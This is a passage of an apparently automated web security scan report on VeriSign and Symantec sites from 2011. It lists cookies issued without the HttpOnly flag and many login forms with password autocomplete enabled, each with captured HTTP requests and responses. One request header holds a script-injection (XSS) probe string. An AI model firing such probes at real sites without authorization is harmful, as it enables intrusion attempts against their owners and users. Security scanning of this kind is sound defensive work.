GET /hp07/i/vlogo.gif HTTP/1.1 Host: www.verisign.co.uk Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:05 GMT Server: ApacheSet-Cookie: v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk Last-Modified: Mon, 04 Apr 2011 20:53:46 GMT ETag: "29480d7-13e4-4a01df4a82a80" Accept-Ranges: bytes Content-Length: 5092 Content-Type: image/gif GIF89aZ.)...."""..0.........DDD.........333........%UUU.........#. ..............-...-)*.........fff!..... .....www..(..#"..3/0......&"#.........\YZigh...0,-$ !*&'.............F..*.........PLM......M...[SNIP]...
10.117. https://www.verisign.com/assets/visual-sciences/vip/zig.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/assets/visual-sciences/vip/zig.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/visual-sciences/vip/zig.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: https://idprotect.verisign.com/toolbar/activate.v Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.verisign.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:55 GMT Server: ApacheSet-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT Accept-Ranges: bytes Content-Length: 2602 Expires: Sun, 09 Oct 2011 21:47:55 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-javascript //REFERENCE PAGE TAG var ct = "<img src="; var cd = "//www.verisign.com"; //this should contain the domain of the web site var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai...[SNIP]...
10.118. https://www4.symantec.com/Vrt/wl
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www4.symantec.com
Path:
/Vrt/wl
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SYMC_TRANS_ID=69836485@@1315604068690; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Vrt/wl?tu_id=akMg1303300545922330202 HTTP/1.1 Host: www4.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315621972496-New%7C1336357972496%3B%20event69%3Devent69%7C1336357972499%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:34:28 GMT Content-type: text/html X-atg-version: ATGPlatform/2006.3p3 [ DASLicense/0 DPSLicense/0 ]Set-cookie: SYMC_TRANS_ID=69836485@@1315604068690; path=/ Location: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 Content-Length: 97 <HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
11. Password field with autocomplete enabled
previous
next
There are 43 instances of this issue:
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
11.1. http://blogs.verisign.com/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/
Issue detail
The page contains a form with the following action URL:https://test-products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /?tid=footer HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 11 May 2011 20:19:01 GMT ETag: "1a606f6-9f7a-c8827740" Accept-Ranges: bytes Content-Length: 40826 Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.2. https://knowledge.verisign.ch/support/code-signing-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.3. https://knowledge.verisign.ch/support/digital-id-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/digital-id-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.4. https://knowledge.verisign.ch/support/mpki-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/mpki-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.5. https://knowledge.verisign.ch/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.6. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.7. https://knowledge.verisign.ch/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.8. https://knowledge.verisign.com/support/code-signing-support/index
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.9. https://knowledge.verisign.com/support/code-signing-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.10. https://knowledge.verisign.com/support/digital-id-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/digital-id-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.11. https://knowledge.verisign.com/support/eca-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/eca-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/eca-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.12. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:51 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 42730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.13. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/mpki-for-ssl-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:45:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.14. https://knowledge.verisign.com/support/mpki-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.15. https://knowledge.verisign.com/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 46210 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.16. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.17. https://knowledge.verisign.com/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/trust-seal-support/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.18. https://products.verisign.com/geocenter/reseller/logon.do
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/geocenter/reseller/logon.do
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
POST /geocenter/reseller/logon.do HTTP/1.1 Host: products.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false Content-Length: 40 Cache-Control: max-age=0 Origin: https://knowledge.verisign.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765 userName=xss&password=xss&submit=Sign+In
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:02 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17164 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]... <td width="600" valign="top"> <form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8"> <table>...[SNIP]... <td> <input type="password" name="password" maxlength="20" size="16" value="xss" style="width:130px;"> </td>...[SNIP]...
11.19. https://products.verisign.com/geocenter/reseller/logon.jsp
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/geocenter/reseller/logon.jsp
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /geocenter/reseller/logon.jsp HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:15 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17095 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]... <td width="600" valign="top"> <form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8"> <table>...[SNIP]... <td> <input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;"> </td>...[SNIP]...
11.20. https://products.verisign.com/geocenter/reseller/register.do
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/geocenter/reseller/register.do
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
